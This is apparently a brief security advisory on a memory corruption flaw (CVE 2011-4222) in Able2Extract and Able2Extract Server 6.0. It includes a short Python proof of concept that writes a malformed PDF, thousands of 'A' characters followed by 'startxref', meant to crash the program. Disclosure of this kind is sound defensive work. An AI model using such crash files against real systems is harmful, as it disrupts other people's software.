Able2Extract and Able2Extract Server Memory Corruption Vulnerability

Summary

Able2Extract and Able2Extract Server v 6.0 suffers from memory corruption vulnerability

Credit:

The information has been provided by Carlos Mario Penagos Hollmann.


Details

Vulnerable Systems:
 * Able2Extract and Able2Extract Server v 6.0

payload =’A’*12000
crash=’startxref’
pdf=payload+crash

filename = ‘slimpdPoC.pdf’
file = open(filename,’w’)
file.writelines(pdf)
file.close()

CVE Information:
2011-4222

Disclosure Timeline:
Published: 2012-06-25

Categories: News